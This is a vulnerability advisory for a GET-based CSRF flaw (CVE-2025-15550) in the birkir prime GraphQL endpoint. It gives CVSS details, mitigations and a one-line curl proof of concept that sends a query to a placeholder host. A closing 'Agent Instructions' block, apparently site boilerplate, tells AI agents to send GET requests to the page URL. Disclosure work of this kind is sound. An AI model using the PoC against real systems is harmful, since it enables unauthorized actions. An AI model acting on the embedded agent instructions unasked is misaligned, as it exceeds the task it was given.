# birkir prime GraphQL GET-Based CSRF (CVE-2025-15550)

**Author:** Beatriz Fresno Naumova (beafn28), NinjaGPT

**Date:** 29/01/2026

**Vendor:** birkir

**Product:** prime

**Versions affected:** ≤ 0.4.0.beta.0

**Component:** GraphQL endpoint (GET-based query handling)

**CWE:** CWE-352 – Cross-Site Request Forgery (CSRF)

**Attack type:** Remote

**Impact:** Cross-Site Request Forgery (CSRF)

### Description

birkir prime versions up to and including **0.4.0.beta.0** are affected by a **Cross-Site Request Forgery (CSRF)** vulnerability in the GraphQL endpoint.

The application allows GraphQL queries to be executed via **HTTP GET requests**, which can be triggered automatically by a victim’s browser. Due to the absence of proper CSRF protections, attackers can craft malicious GET requests containing GraphQL queries and force authenticated users to unknowingly execute them.

This behavior enables attackers to abuse the victim’s authenticated session to perform unauthorized actions by manipulating GraphQL query parameters.

### Impact

#### Primary impact

Execution of unauthorized GraphQL queries in the context of an authenticated user.

#### Consequences

* Unauthorized state-changing actions
* Abuse of privileged GraphQL functionality
* Potential data modification or exposure
* Violation of application trust boundaries

### PoC

```
curl -X GET -H "User-Agent: XXX" -H "Accept-Encoding: gzip, deflate" -H "Accept: */*" -H "Connection: keep-alive" -d '' 'http://IP:PORT/graphql?query=query+cop+%7B__typename%7D'
```

### CVSS Details

#### CVSS v4.0 Vector

`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N`

**Base Score:** 5.1 (Medium)

### Solution

No official fix was available at the time of disclosure.

### Recommendation

* Disable execution of GraphQL queries via **HTTP GET**.
* Enforce CSRF protection mechanisms for all GraphQL operations.
* Require POST requests with valid CSRF tokens for state-changing queries.
* Apply strict origin and same-site cookie policies.

### Mitigation

* Restrict GraphQL endpoints to accept **POST requests only**.
* Implement CSRF tokens or double-submit cookie mechanisms.
* Review GraphQL resolvers to ensure proper authorization checks.
* Regularly audit GraphQL endpoints for unintended behaviors.

### Discoverer

* Beatriz Fresno Naumova (beafn28)
* NinjaGPT

### References

* **CVE Record:** <https://www.cve.org/CVERecord?id=CVE-2025-15550>
* **VulnCheck:** <https://www.vulncheck.com/advisories/birkir-prime-beta-cross-site-request-forgery-in-graphql>
* **Prime:** [https://github.com/birkir/prime/](https://github.com/birkir/prime)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/cve-and-poc/birkir-prime-graphql-get-based-csrf-cve-2025-15550.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.